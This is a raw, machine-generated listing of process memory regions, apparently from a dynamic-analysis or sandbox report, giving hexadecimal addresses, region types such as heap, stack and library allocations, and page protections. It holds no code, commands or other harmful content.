18C48A24000
|
heap
|
page read and write
|
||
18C48B17000
|
heap
|
page read and write
|
||
16636662000
|
heap
|
page read and write
|
||
7FFAACF90000
|
trusted library allocation
|
page read and write
|
||
F2C000
|
heap
|
page read and write
|
||
18C48B80000
|
heap
|
page read and write
|
||
207245BB000
|
heap
|
page read and write
|
||
20724697000
|
heap
|
page read and write
|
||
18C48B5B000
|
heap
|
page read and write
|
||
18C46B1D000
|
heap
|
page read and write
|
||
7FFAACF73000
|
trusted library allocation
|
page read and write
|
||
7FFAACDC0000
|
trusted library allocation
|
page read and write
|
||
18C46AF3000
|
heap
|
page read and write
|
||
19F21CD000
|
stack
|
page read and write
|
||
E7ABAF9000
|
stack
|
page read and write
|
||
287C000
|
trusted library allocation
|
page read and write
|
||
224B5803000
|
heap
|
page read and write
|
||
1661F715000
|
trusted library allocation
|
page read and write
|
||
4149D4C000
|
stack
|
page read and write
|
||
2249B5A8000
|
heap
|
page read and write
|
||
224AD331000
|
trusted library allocation
|
page read and write
|
||
18C48A28000
|
heap
|
page read and write
|
||
17AF7847000
|
heap
|
page read and write
|
||
7FFB23AFD000
|
unkown
|
page readonly
|
||
17A81E21000
|
trusted library allocation
|
page read and write
|
||
1C438500000
|
heap
|
page read and write
|
||
2A7D000
|
trusted library allocation
|
page read and write
|
||
7FFAACF00000
|
trusted library allocation
|
page read and write
|
||
18C48A0B000
|
heap
|
page read and write
|
||
18C46ADE000
|
heap
|
page read and write
|
||
1C43D3D0000
|
remote allocation
|
page read and write
|
||
7FFAACBB4000
|
trusted library allocation
|
page read and write
|
||
20724596000
|
heap
|
page read and write
|
||
7FFAACD62000
|
trusted library allocation
|
page read and write
|
||
7FFAACBEC000
|
trusted library allocation
|
page execute and read and write
|
||
7FFAACEEA000
|
trusted library allocation
|
page read and write
|
||
1E89E028000
|
trusted library allocation
|
page read and write
|
||
2249B705000
|
heap
|
page read and write
|
||
18C489E4000
|
heap
|
page read and write
|
||
166367B0000
|
trusted library allocation
|
page read and write
|
||
2249B59C000
|
heap
|
page read and write
|
||
1661C570000
|
heap
|
page readonly
|
||
1C437CE1000
|
heap
|
page read and write
|
||
7DF4DE5A0000
|
trusted library allocation
|
page execute and read and write
|
||
1C437D29000
|
heap
|
page read and write
|
||
1E8B582B000
|
heap
|
page read and write
|
||
7FFAACD90000
|
trusted library allocation
|
page read and write
|
||
18C48A13000
|
heap
|
page read and write
|
||
224B5593000
|
heap
|
page read and write
|
||
18C48A18000
|
heap
|
page read and write
|
||
207245C2000
|
heap
|
page read and write
|
||
18C489F1000
|
heap
|
page read and write
|
||
10A5000
|
heap
|
page read and write
|
||
1662E002000
|
trusted library allocation
|
page read and write
|
||
207245BE000
|
heap
|
page read and write
|
||
2249E042000
|
trusted library allocation
|
page read and write
|
||
207245BB000
|
heap
|
page read and write
|
||
BFC000
|
heap
|
page read and write
|
||
18C4B22A000
|
heap
|
page read and write
|
||
7FFAACB8D000
|
trusted library allocation
|
page execute and read and write
|
||
207245B6000
|
heap
|
page read and write
|
||
18C48B17000
|
heap
|
page read and write
|
||
207225C0000
|
heap
|
page read and write
|
||
224B5750000
|
heap
|
page read and write
|
||
1D9227E000
|
stack
|
page read and write
|
||
7FFAACB82000
|
trusted library allocation
|
page read and write
|
||
2072459B000
|
heap
|
page read and write
|
||
1C437C9F000
|
heap
|
page read and write
|
||
20724691000
|
heap
|
page read and write
|
||
20724678000
|
heap
|
page read and write
|
||
18C48AEE000
|
heap
|
page read and write
|
||
18C46B0D000
|
heap
|
page read and write
|
||
7FFAACE90000
|
trusted library allocation
|
page read and write
|
||
18C46B07000
|
heap
|
page read and write
|
||
1D91EFA000
|
stack
|
page read and write
|
||
224AD041000
|
trusted library allocation
|
page read and write
|
||
1E8B5986000
|
heap
|
page read and write
|
||
1B490000
|
heap
|
page read and write
|
||
1C43D380000
|
trusted library allocation
|
page read and write
|
||
1E89D3A0000
|
heap
|
page execute and read and write
|
||
166362D0000
|
heap
|
page read and write
|
||
332238E000
|
stack
|
page read and write
|
||
1C43851A000
|
heap
|
page read and write
|
||
1C43D250000
|
trusted library allocation
|
page read and write
|
||
7FFAACFF0000
|
trusted library allocation
|
page read and write
|
||
19F0DFF000
|
stack
|
page read and write
|
||
7DF4DE5B0000
|
trusted library allocation
|
page execute and read and write
|
||
207225E8000
|
heap
|
page read and write
|
||
224B58F4000
|
heap
|
page read and write
|
||
18C48B77000
|
heap
|
page read and write
|
||
2249B560000
|
heap
|
page read and write
|
||
18C48A01000
|
heap
|
page read and write
|
||
18C48B1E000
|
heap
|
page read and write
|
||
2072459B000
|
heap
|
page read and write
|
||
7FFAACED9000
|
trusted library allocation
|
page read and write
|
||
18C489EA000
|
heap
|
page read and write
|
||
1E89D410000
|
heap
|
page execute and read and write
|
||
20724568000
|
heap
|
page read and write
|
||
207245BA000
|
heap
|
page read and write
|
||
224B55D8000
|
heap
|
page read and write
|
||
207245C7000
|
heap
|
page read and write
|
||
1E89D397000
|
heap
|
page execute and read and write
|
||
18C48A20000
|
heap
|
page read and write
|
||
7FFAACD50000
|
trusted library allocation
|
page execute and read and write
|
||
1C43E000000
|
heap
|
page read and write
|
||
7FFAACF40000
|
trusted library allocation
|
page read and write
|
||
1CA6D000
|
stack
|
page read and write
|
||
18C48B17000
|
heap
|
page read and write
|
||
207225A0000
|
heap
|
page read and write
|
||
1E89DE73000
|
trusted library allocation
|
page read and write
|
||
25ED7FF000
|
stack
|
page read and write
|
||
2072459B000
|
heap
|
page read and write
|
||
207245AC000
|
heap
|
page read and write
|
||
7FFAACD60000
|
trusted library allocation
|
page execute and read and write
|
||
1661F821000
|
trusted library allocation
|
page read and write
|
||
4148F7A000
|
stack
|
page read and write
|
||
1C437B90000
|
trusted library section
|
page read and write
|
||
2249B530000
|
heap
|
page read and write
|
||
1E89E72A000
|
trusted library allocation
|
page read and write
|
||
18C48A00000
|
heap
|
page read and write
|
||
1E89B69C000
|
heap
|
page read and write
|
||
1D068000
|
stack
|
page read and write
|
||
FF2000
|
heap
|
page read and write
|
||
1BD9E000
|
stack
|
page read and write
|
||
207225AC000
|
heap
|
page read and write
|
||
10A0000
|
heap
|
page read and write
|
||
17AF7865000
|
heap
|
page read and write
|
||
18C48ADE000
|
heap
|
page read and write
|
||
1CCAE000
|
heap
|
page read and write
|
||
207245A6000
|
heap
|
page read and write
|
||
207246F0000
|
heap
|
page read and write
|
||
18C48A24000
|
heap
|
page read and write
|
||
18C48A20000
|
heap
|
page read and write
|
||
1D917FE000
|
unkown
|
page readonly
|
||
17A81126000
|
trusted library allocation
|
page read and write
|
||
1C437B50000
|
heap
|
page read and write
|
||
1C96E000
|
stack
|
page read and write
|
||
7FFAACE50000
|
trusted library allocation
|
page read and write
|
||
7FFAACF90000
|
trusted library allocation
|
page read and write
|
||
20724562000
|
heap
|
page read and write
|
||
7FFAACBA0000
|
trusted library allocation
|
page read and write
|
||
2072472F000
|
heap
|
page read and write
|
||
B54000
|
heap
|
page read and write
|
||
17AF6F94000
|
heap
|
page read and write
|
||
1E89B640000
|
heap
|
page read and write
|
||
7FFAACE70000
|
trusted library allocation
|
page read and write
|
||
207225B8000
|
heap
|
page read and write
|
||
17AF5508000
|
heap
|
page read and write
|
||
1D9277E000
|
stack
|
page read and write
|
||
18C48A20000
|
heap
|
page read and write
|
||
17A80BFA000
|
trusted library allocation
|
page read and write
|
||
17AF6F85000
|
heap
|
page read and write
|
||
1C439095000
|
heap
|
page read and write
|
||
1C438C10000
|
trusted library section
|
page readonly
|
||
18C489D9000
|
heap
|
page read and write
|
||
18C48B17000
|
heap
|
page read and write
|
||
F8D000
|
heap
|
page read and write
|
||
1C4390BA000
|
heap
|
page read and write
|
||
207245A6000
|
heap
|
page read and write
|
||
7FFAACDA4000
|
trusted library allocation
|
page read and write
|
||
17A9030B000
|
trusted library allocation
|
page read and write
|
||
7FFAACE10000
|
trusted library allocation
|
page read and write
|
||
17AF54B0000
|
trusted library section
|
page read and write
|
||
18C48A05000
|
heap
|
page read and write
|
||
17AF5490000
|
heap
|
page read and write
|
||
1E8B57D5000
|
heap
|
page read and write
|
||
48A293F000
|
unkown
|
page read and write
|
||
2072459B000
|
heap
|
page read and write
|
||
4148EF9000
|
stack
|
page read and write
|
||
33227F7000
|
stack
|
page read and write
|
||
1E89E0BA000
|
trusted library allocation
|
page read and write
|
||
25ED678000
|
stack
|
page read and write
|
||
2610000
|
heap
|
page execute and read and write
|
||
2072456B000
|
heap
|
page read and write
|
||
1663665D000
|
heap
|
page read and write
|
||
17A80F69000
|
trusted library allocation
|
page read and write
|
||
207245C6000
|
heap
|
page read and write
|
||
18C489DF000
|
heap
|
page read and write
|
||
B26000
|
heap
|
page read and write
|
||
19F11FE000
|
stack
|
page read and write
|
||
7FFB23B00000
|
unkown
|
page read and write
|
||
B95000
|
heap
|
page read and write
|
||
18C48335000
|
heap
|
page read and write
|
||
7FFAACE82000
|
trusted library allocation
|
page read and write
|
||
207246DB000
|
heap
|
page read and write
|
||
7FFAAD000000
|
trusted library allocation
|
page read and write
|
||
7FFAACDF0000
|
trusted library allocation
|
page read and write
|
||
18C48B87000
|
heap
|
page read and write
|
||
33237C9000
|
stack
|
page read and write
|
||
17AF5546000
|
heap
|
page read and write
|
||
207245C6000
|
heap
|
page read and write
|
||
18C489FD000
|
heap
|
page read and write
|
||
1661DF80000
|
heap
|
page read and write
|
||
20724593000
|
heap
|
page read and write
|
||
271F000
|
stack
|
page read and write
|
||
1661FDB4000
|
trusted library allocation
|
page read and write
|
||
7FFAAD000000
|
trusted library allocation
|
page read and write
|
||
18C48A1C000
|
heap
|
page read and write
|
||
1E89B673000
|
heap
|
page read and write
|
||
18C48BB9000
|
heap
|
page read and write
|
||
2072457A000
|
heap
|
page read and write
|
||
20724672000
|
heap
|
page read and write
|
||
7FFAACBCD000
|
trusted library allocation
|
page execute and read and write
|
||
2249E7C3000
|
trusted library allocation
|
page read and write
|
||
19F12FD000
|
stack
|
page read and write
|
||
1E89B9D5000
|
heap
|
page read and write
|
||
18C489EA000
|
heap
|
page read and write
|
||
20724592000
|
heap
|
page read and write
|
||
18C48A30000
|
heap
|
page read and write
|
||
7FFAACFD0000
|
trusted library allocation
|
page read and write
|
||
7FFAACF00000
|
trusted library allocation
|
page read and write
|
||
1B99E000
|
stack
|
page read and write
|
||
18C48A09000
|
heap
|
page read and write
|
||
1ACF0000
|
trusted library allocation
|
page read and write
|
||
7FFAACD90000
|
trusted library allocation
|
page execute and read and write
|
||
18C48A0E000
|
heap
|
page read and write
|
||
25ED77E000
|
stack
|
page read and write
|
||
18C48A09000
|
heap
|
page read and write
|
||
3E2D6FB000
|
stack
|
page read and write
|
||
18C489C0000
|
heap
|
page read and write
|
||
18C48A24000
|
heap
|
page read and write
|
||
18C48A2C000
|
heap
|
page read and write
|
||
4148A7E000
|
stack
|
page read and write
|
||
12A71000
|
trusted library allocation
|
page read and write
|
||
2249EE42000
|
trusted library allocation
|
page read and write
|
||
18C48A1C000
|
heap
|
page read and write
|
||
18C48B6F000
|
heap
|
page read and write
|
||
20724583000
|
heap
|
page read and write
|
||
13B0000
|
heap
|
page execute and read and write
|
||
1661C3AD000
|
heap
|
page read and write
|
||
20724733000
|
heap
|
page read and write
|
||
7FFAACED4000
|
trusted library allocation
|
page read and write
|
||
E7ABE3E000
|
stack
|
page read and write
|
||
7FFAACCD0000
|
trusted library allocation
|
page execute and read and write
|
||
2072457B000
|
heap
|
page read and write
|
||
2249E0F9000
|
trusted library allocation
|
page read and write
|
||
2249DDB4000
|
trusted library allocation
|
page read and write
|
||
7FFAACD90000
|
trusted library allocation
|
page read and write
|
||
2860000
|
heap
|
page execute and read and write
|
||
1B79F000
|
stack
|
page read and write
|
||
1C438C40000
|
trusted library section
|
page readonly
|
||
7FFAACD70000
|
trusted library allocation
|
page execute and read and write
|
||
1C438C30000
|
trusted library section
|
page readonly
|
||
4148FFE000
|
stack
|
page read and write
|
||
207245BE000
|
heap
|
page read and write
|
||
207245B1000
|
heap
|
page read and write
|
||
7FFAACFA6000
|
trusted library allocation
|
page read and write
|
||
207245B7000
|
heap
|
page read and write
|
||
20724700000
|
heap
|
page read and write
|
||
7FFAACCA0000
|
trusted library allocation
|
page execute and read and write
|
||
18C48A18000
|
heap
|
page read and write
|
||
1B4CE000
|
stack
|
page read and write
|
||
1BF50000
|
heap
|
page read and write
|
||
2249B6F0000
|
trusted library allocation
|
page read and write
|
||
7FFAACFC0000
|
trusted library allocation
|
page read and write
|
||
7FFAACDD0000
|
trusted library allocation
|
page read and write
|
||
7FFAACEA0000
|
trusted library allocation
|
page read and write
|
||
20724596000
|
heap
|
page read and write
|
||
18C48A30000
|
heap
|
page read and write
|
||
207245C7000
|
heap
|
page read and write
|
||
18C48BA3000
|
heap
|
page read and write
|
||
20724691000
|
heap
|
page read and write
|
||
2072459B000
|
heap
|
page read and write
|
||
41487FF000
|
stack
|
page read and write
|
||
1C437C89000
|
heap
|
page read and write
|
||
20724674000
|
heap
|
page read and write
|
||
20722590000
|
heap
|
page read and write
|
||
2072459B000
|
heap
|
page read and write
|
||
16636318000
|
heap
|
page read and write
|
||
1661C360000
|
heap
|
page read and write
|
||
7FFAACFE0000
|
trusted library allocation
|
page read and write
|
||
18C48B1E000
|
heap
|
page read and write
|
||
1CC73000
|
heap
|
page read and write
|
||
207245A2000
|
heap
|
page read and write
|
||
18C48A1C000
|
heap
|
page read and write
|
||
7FFAACCE0000
|
trusted library allocation
|
page execute and read and write
|
||
E7ABC3B000
|
stack
|
page read and write
|
||
12873000
|
trusted library allocation
|
page read and write
|
||
20724583000
|
heap
|
page read and write
|
||
7FFAACD68000
|
trusted library allocation
|
page read and write
|
||
1E89E670000
|
trusted library allocation
|
page read and write
|
||
1E89B6BC000
|
heap
|
page read and write
|
||
224B58CC000
|
heap
|
page read and write
|
||
18C48A0B000
|
heap
|
page read and write
|
||
18C48B9E000
|
heap
|
page read and write
|
||
207246F0000
|
heap
|
page read and write
|
||
1E8B59C5000
|
heap
|
page read and write
|
||
7FFAACE90000
|
trusted library allocation
|
page read and write
|
||
17A813C5000
|
trusted library allocation
|
page read and write
|
||
7FFAACB90000
|
trusted library allocation
|
page read and write
|
||
1663631A000
|
heap
|
page read and write
|
||
7FFAACB8D000
|
trusted library allocation
|
page execute and read and write
|
||
2249B642000
|
heap
|
page read and write
|
||
7FFAACF10000
|
trusted library allocation
|
page read and write
|
||
2249DA93000
|
trusted library allocation
|
page read and write
|
||
18C4B200000
|
heap
|
page read and write
|
||
207245B2000
|
heap
|
page read and write
|
||
2072458E000
|
heap
|
page read and write
|
||
7FFAACEE0000
|
trusted library allocation
|
page read and write
|
||
1661E016000
|
trusted library allocation
|
page read and write
|
||
1B43E000
|
stack
|
page read and write
|
||
20724580000
|
heap
|
page read and write
|
||
2072466C000
|
heap
|
page read and write
|
||
1D919FE000
|
unkown
|
page readonly
|
||
20724592000
|
heap
|
page read and write
|
||
20722582000
|
heap
|
page read and write
|
||
207225A6000
|
heap
|
page read and write
|
||
1D92BFD000
|
stack
|
page read and write
|
||
166363A8000
|
heap
|
page read and write
|
||
7FFAACC30000
|
trusted library allocation
|
page read and write
|
||
18C489F9000
|
heap
|
page read and write
|
||
7FFAACF90000
|
trusted library allocation
|
page read and write
|
||
20724592000
|
heap
|
page read and write
|
||
18C46B37000
|
heap
|
page read and write
|
||
25ED9FB000
|
stack
|
page read and write
|
||
18C489EF000
|
heap
|
page read and write
|
||
1663671B000
|
heap
|
page read and write
|
||
1C660000
|
heap
|
page read and write
|
||
12D0000
|
trusted library allocation
|
page read and write
|
||
48A29BE000
|
stack
|
page read and write
|
||
1C43851A000
|
heap
|
page read and write
|
||
20723EC0000
|
heap
|
page read and write
|
||
207245BE000
|
heap
|
page read and write
|
||
18C489EF000
|
heap
|
page read and write
|
||
1C437B80000
|
trusted library allocation
|
page read and write
|
||
18C46B06000
|
heap
|
page read and write
|
||
20724596000
|
heap
|
page read and write
|
||
1E89E3A1000
|
trusted library allocation
|
page read and write
|
||
20722595000
|
heap
|
page read and write
|
||
207245B6000
|
heap
|
page read and write
|
||
18C48AF5000
|
heap
|
page read and write
|
||
18C489F5000
|
heap
|
page read and write
|
||
17AF7670000
|
heap
|
page read and write
|
||
18C48A1C000
|
heap
|
page read and write
|
||
1330000
|
heap
|
page read and write
|
||
18C48BB9000
|
heap
|
page read and write
|
||
1E89B6E3000
|
heap
|
page read and write
|
||
18C48A20000
|
heap
|
page read and write
|
||
18C46B60000
|
heap
|
page read and write
|
||
1E89E05C000
|
trusted library allocation
|
page read and write
|
||
207245A1000
|
heap
|
page read and write
|
||
20726DD0000
|
heap
|
page read and write
|
||
207245BA000
|
heap
|
page read and write
|
||
1E89B6A0000
|
heap
|
page read and write
|
||
207245A8000
|
heap
|
page read and write
|
||
207225BF000
|
heap
|
page read and write
|
||
18C48ADB000
|
heap
|
page read and write
|
||
18C48BA0000
|
heap
|
page read and write
|
||
166365CD000
|
heap
|
page read and write
|
||
20724676000
|
heap
|
page read and write
|
||
1C4390FF000
|
heap
|
page read and write
|
||
1C437CA5000
|
heap
|
page read and write
|
||
18C48AF5000
|
heap
|
page read and write
|
||
7FFAACFF0000
|
trusted library allocation
|
page read and write
|
||
18C48B80000
|
heap
|
page read and write
|
||
1C439047000
|
heap
|
page read and write
|
||
7FFAACE60000
|
trusted library allocation
|
page read and write
|
||
7FFAACC3C000
|
trusted library allocation
|
page execute and read and write
|
||
7FFB1E3B6000
|
unkown
|
page readonly
|
||
7FFAACE80000
|
trusted library allocation
|
page read and write
|
||
18C48A2C000
|
heap
|
page read and write
|
||
2072457F000
|
heap
|
page read and write
|
||
1E89F249000
|
trusted library allocation
|
page read and write
|
||
1C4390E3000
|
heap
|
page read and write
|
||
18C48BA0000
|
heap
|
page read and write
|
||
16636447000
|
heap
|
page execute and read and write
|
||
20724579000
|
heap
|
page read and write
|
||
18C48A18000
|
heap
|
page read and write
|
||
7FFAACDE0000
|
trusted library allocation
|
page read and write
|
||
20728BA7000
|
heap
|
page read and write
|
||
1E89E023000
|
trusted library allocation
|
page read and write
|
||
1661C3B1000
|
heap
|
page read and write
|
||
1C439000000
|
heap
|
page read and write
|
||
3E2D97C000
|
stack
|
page read and write
|
||
18C48B5E000
|
heap
|
page read and write
|
||
1662E288000
|
trusted library allocation
|
page read and write
|
||
7FFAACBDC000
|
trusted library allocation
|
page execute and read and write
|
||
7FFAACE50000
|
trusted library allocation
|
page read and write
|
||
207245C2000
|
heap
|
page read and write
|
||
1661F0B3000
|
trusted library allocation
|
page read and write
|
||
18C489EF000
|
heap
|
page read and write
|
||
1661C3B9000
|
heap
|
page read and write
|
||
20724596000
|
heap
|
page read and write
|
||
207225EA000
|
heap
|
page read and write
|
||
207245BA000
|
heap
|
page read and write
|
||
20724577000
|
heap
|
page read and write
|
||
207246F0000
|
heap
|
page read and write
|
||
1E89D390000
|
heap
|
page execute and read and write
|
||
18C48A18000
|
heap
|
page read and write
|
||
17A80F65000
|
trusted library allocation
|
page read and write
|
||
207225B1000
|
heap
|
page read and write
|
||
4148AFE000
|
stack
|
page read and write
|
||
18C489EF000
|
heap
|
page read and write
|
||
20723FDA000
|
heap
|
page read and write
|
||
7FFAACBDB000
|
trusted library allocation
|
page read and write
|
||
E7ABBB7000
|
stack
|
page read and write
|
||
17AF54FE000
|
heap
|
page read and write
|
||
207245BF000
|
heap
|
page read and write
|
||
20724731000
|
heap
|
page read and write
|
||
332267E000
|
stack
|
page read and write
|
||
2249B690000
|
heap
|
page read and write
|
||
7FFAACE20000
|
trusted library allocation
|
page read and write
|
||
166366DA000
|
heap
|
page read and write
|
||
7FFAACD80000
|
trusted library allocation
|
page read and write
|
||
7FFAACE40000
|
trusted library allocation
|
page read and write
|
||
224B5670000
|
heap
|
page read and write
|
||
1E89B940000
|
trusted library allocation
|
page read and write
|
||
18C46AFB000
|
heap
|
page read and write
|
||
7FFAACFD0000
|
trusted library allocation
|
page read and write
|
||
12A78000
|
trusted library allocation
|
page read and write
|
||
1C4390FD000
|
heap
|
page read and write
|
||
1661DE22000
|
heap
|
page read and write
|
||
1843ECA9000
|
heap
|
page read and write
|
||
7FFAACD64000
|
trusted library allocation
|
page read and write
|
||
18C4B229000
|
heap
|
page read and write
|
||
7FFAACB90000
|
trusted library allocation
|
page read and write
|
||
B5F000
|
heap
|
page read and write
|
||
7FFAACC36000
|
trusted library allocation
|
page read and write
|
||
18C48A05000
|
heap
|
page read and write
|
||
1090000
|
trusted library allocation
|
page read and write
|
||
3322BFE000
|
stack
|
page read and write
|
||
18C48A20000
|
heap
|
page read and write
|
||
18C48A12000
|
heap
|
page read and write
|
||
1E89E387000
|
trusted library allocation
|
page read and write
|
||
224AD333000
|
trusted library allocation
|
page read and write
|
||
18C48A2D000
|
heap
|
page read and write
|
||
18C48A1C000
|
heap
|
page read and write
|
||
7FFAACD71000
|
trusted library allocation
|
page read and write
|
||
33236CD000
|
stack
|
page read and write
|
||
7FFAACC66000
|
trusted library allocation
|
page execute and read and write
|
||
2249E2E2000
|
trusted library allocation
|
page read and write
|
||
E7ABA7D000
|
stack
|
page read and write
|
||
17AF6F80000
|
heap
|
page read and write
|
||
1661C560000
|
trusted library allocation
|
page read and write
|
||
1661C5B0000
|
trusted library allocation
|
page read and write
|
||
C2C000
|
heap
|
page read and write
|
||
1300000
|
heap
|
page execute and read and write
|
||
1D46E000
|
stack
|
page read and write
|
||
7FFAACC3C000
|
trusted library allocation
|
page execute and read and write
|
||
19F1379000
|
stack
|
page read and write
|
||
7FFAACEB0000
|
trusted library allocation
|
page read and write
|
||
7FFAACE94000
|
trusted library allocation
|
page read and write
|
||
207245C2000
|
heap
|
page read and write
|
||
166365AF000
|
heap
|
page read and write
|
||
2249B450000
|
heap
|
page read and write
|
||
2590000
|
heap
|
page read and write
|
||
1E89B660000
|
heap
|
page read and write
|
||
207245C2000
|
heap
|
page read and write
|
||
20722587000
|
heap
|
page read and write
|
||
1C19C000
|
stack
|
page read and write
|
||
1C43D3D0000
|
remote allocation
|
page read and write
|
||
BC0000
|
heap
|
page read and write
|
||
18C48A0B000
|
heap
|
page read and write
|
||
207245A1000
|
heap
|
page read and write
|
||
1D9287E000
|
stack
|
page read and write
|
||
18C489F3000
|
heap
|
page read and write
|
||
7FFAACEF0000
|
trusted library allocation
|
page read and write
|
||
E7AC90C000
|
stack
|
page read and write
|
||
1E8B5A1D000
|
heap
|
page read and write
|
||
25EDC7B000
|
stack
|
page read and write
|
||
207245AC000
|
heap
|
page read and write
|
||
20724596000
|
heap
|
page read and write
|
||
7FFAACFDD000
|
trusted library allocation
|
page read and write
|
||
7FFAACEE0000
|
trusted library allocation
|
page read and write
|
||
1E89D4A8000
|
trusted library allocation
|
page read and write
|
||
18C48A20000
|
heap
|
page read and write
|
||
7FFB23AF9000
|
unkown
|
page readonly
|
||
18C48A12000
|
heap
|
page read and write
|
||
2249B5A2000
|
heap
|
page read and write
|
||
18C48A13000
|
heap
|
page read and write
|
||
1ADFD000
|
stack
|
page read and write
|
||
2249B5AA000
|
heap
|
page read and write
|
||
11AE000
|
stack
|
page read and write
|
||
1C437CEE000
|
heap
|
page read and write
|
||
18C489FC000
|
heap
|
page read and write
|
||
2072472F000
|
heap
|
page read and write
|
||
7DF4588C0000
|
trusted library allocation
|
page execute and read and write
|
||
3322B7E000
|
stack
|
page read and write
|
||
7FFAACC66000
|
trusted library allocation
|
page execute and read and write
|
||
A30000
|
heap
|
page read and write
|
||
1E89B8F0000
|
trusted library allocation
|
page read and write
|
||
207245A6000
|
heap
|
page read and write
|
||
20724578000
|
heap
|
page read and write
|
||
18C48A13000
|
heap
|
page read and write
|
||
7FFAACFE0000
|
trusted library allocation
|
page read and write
|
||
20724731000
|
heap
|
page read and write
|
||
7FFAACF10000
|
trusted library allocation
|
page read and write
|
||
20724689000
|
heap
|
page read and write
|
||
18C489DD000
|
heap
|
page read and write
|
||
19F1478000
|
stack
|
page read and write
|
||
1E89F1FF000
|
trusted library allocation
|
page read and write
|
||
1E89E5FA000
|
trusted library allocation
|
page read and write
|
||
1D920FB000
|
stack
|
page read and write
|
||
207245C6000
|
heap
|
page read and write
|
||
3E2D1BE000
|
stack
|
page read and write
|
||
E7ABDBE000
|
stack
|
page read and write
|
||
7FFAACCB0000
|
trusted library allocation
|
page execute and read and write
|
||
20724662000
|
heap
|
page read and write
|
||
33226F9000
|
stack
|
page read and write
|
||
3E2D5FD000
|
stack
|
page read and write
|
||
16636800000
|
heap
|
page read and write
|
||
7FF4B21C0000
|
trusted library allocation
|
page execute and read and write
|
||
18C48A18000
|
heap
|
page read and write
|
||
207245A1000
|
heap
|
page read and write
|
||
1E89B830000
|
heap
|
page read and write
|
||
E7ABEBB000
|
stack
|
page read and write
|
||
332277E000
|
stack
|
page read and write
|
||
207245AC000
|
heap
|
page read and write
|
||
18C48A20000
|
heap
|
page read and write
|
||
1C438513000
|
heap
|
page read and write
|
||
20724696000
|
heap
|
page read and write
|
||
18C48A24000
|
heap
|
page read and write
|
||
7FFAACF50000
|
trusted library allocation
|
page read and write
|
||
1843EE90000
|
heap
|
page read and write
|
||
18C48A1C000
|
heap
|
page read and write
|
||
20724589000
|
heap
|
page read and write
|
||
7FFAACD7A000
|
trusted library allocation
|
page read and write
|
||
1661C675000
|
heap
|
page read and write
|
||
33229FA000
|
stack
|
page read and write
|
||
18C48A02000
|
heap
|
page read and write
|
||
1E89E544000
|
trusted library allocation
|
page read and write
|
||
7FFAACD68000
|
trusted library allocation
|
page read and write
|
||
1C437D13000
|
heap
|
page read and write
|
||
18C489E4000
|
heap
|
page read and write
|
||
20724672000
|
heap
|
page read and write
|
||
1B59E000
|
stack
|
page read and write
|
||
20724700000
|
heap
|
page read and write
|
||
7FFAACD20000
|
trusted library allocation
|
page read and write
|
||
1661EB97000
|
trusted library allocation
|
page read and write
|
||
17AF6E30000
|
trusted library allocation
|
page read and write
|
||
7FFAACDD0000
|
trusted library allocation
|
page read and write
|
||
1040000
|
heap
|
page read and write
|
||
1E89E19F000
|
trusted library allocation
|
page read and write
|
||
224B5500000
|
heap
|
page execute and read and write
|
||
18C489FD000
|
heap
|
page read and write
|
||
207245AC000
|
heap
|
page read and write
|
||
20724691000
|
heap
|
page read and write
|
||
207245C2000
|
heap
|
page read and write
|
||
17A812D9000
|
trusted library allocation
|
page read and write
|
||
20724593000
|
heap
|
page read and write
|
||
1E89E7E5000
|
trusted library allocation
|
page read and write
|
||
18C489E0000
|
heap
|
page read and write
|
||
2072259A000
|
heap
|
page read and write
|
||
207246DB000
|
heap
|
page read and write
|
||
E7ABCB8000
|
stack
|
page read and write
|
||
2A7F000
|
trusted library allocation
|
page read and write
|
||
20724583000
|
heap
|
page read and write
|
||
1E8B5773000
|
heap
|
page read and write
|
||
2072459B000
|
heap
|
page read and write
|
||
17AF5400000
|
heap
|
page read and write
|
||
18C48A1C000
|
heap
|
page read and write
|
||
20722588000
|
heap
|
page read and write
|
||
18C48A20000
|
heap
|
page read and write
|
||
18C4B202000
|
heap
|
page read and write
|
||
BC8000
|
heap
|
page read and write
|
||
7FFAACFF0000
|
trusted library allocation
|
page read and write
|
||
7FFAACB90000
|
trusted library allocation
|
page read and write
|
||
7FFAACEB3000
|
trusted library allocation
|
page read and write
|
||
7FFAACD62000
|
trusted library allocation
|
page read and write
|
||
7FFAACBB0000
|
trusted library allocation
|
page read and write
|
||
18C46AF3000
|
heap
|
page read and write
|
||
166366F0000
|
heap
|
page read and write
|
||
2072472F000
|
heap
|
page read and write
|
||
18C489FC000
|
heap
|
page read and write
|
||
207245A1000
|
heap
|
page read and write
|
||
18C48B25000
|
heap
|
page read and write
|
||
7FFAACC4C000
|
trusted library allocation
|
page execute and read and write
|
||
20724678000
|
heap
|
page read and write
|
||
18C48B97000
|
heap
|
page read and write
|
||
18C46B28000
|
heap
|
page read and write
|
||
7FFAACCA6000
|
trusted library allocation
|
page execute and read and write
|
||
2072458E000
|
heap
|
page read and write
|
||
1661C5F0000
|
trusted library allocation
|
page read and write
|
||
207245C2000
|
heap
|
page read and write
|
||
2249B5BC000
|
heap
|
page read and write
|
||
18C48A18000
|
heap
|
page read and write
|
||
7FFAACDB0000
|
trusted library allocation
|
page execute and read and write
|
||
7FFAACDF0000
|
trusted library allocation
|
page read and write
|
||
18C48B97000
|
heap
|
page read and write
|
||
18C4B223000
|
heap
|
page read and write
|
||
E7AB9F7000
|
stack
|
page read and write
|
||
224B575B000
|
heap
|
page read and write
|
||
1415000
|
heap
|
page read and write
|
||
18C48A1C000
|
heap
|
page read and write
|
||
17AF5470000
|
trusted library section
|
page read and write
|
||
18C48AF1000
|
heap
|
page read and write
|
||
207245A6000
|
heap
|
page read and write
|
||
207245CD000
|
heap
|
page read and write
|
||
19F1279000
|
stack
|
page read and write
|
||
C40000
|
heap
|
page read and write
|
||
4149BCC000
|
stack
|
page read and write
|
||
1661C670000
|
heap
|
page read and write
|
||
1C437C5C000
|
heap
|
page read and write
|
||
7FFAACD80000
|
trusted library allocation
|
page read and write
|
||
18C48A05000
|
heap
|
page read and write
|
||
20724682000
|
heap
|
page read and write
|
||
17A80F76000
|
trusted library allocation
|
page read and write
|
||
1661C365000
|
heap
|
page read and write
|
||
2249E401000
|
trusted library allocation
|
page read and write
|
||
18C48B9B000
|
heap
|
page read and write
|
||
7FFAACED0000
|
trusted library allocation
|
page read and write
|
||
7FFAACFB0000
|
trusted library allocation
|
page execute and read and write
|
||
7FFB22776000
|
unkown
|
page readonly
|
||
224B5759000
|
heap
|
page read and write
|
||
18C48A20000
|
heap
|
page read and write
|
||
3E2D4FF000
|
stack
|
page read and write
|
||
1E8B59CB000
|
heap
|
page read and write
|
||
18C48A28000
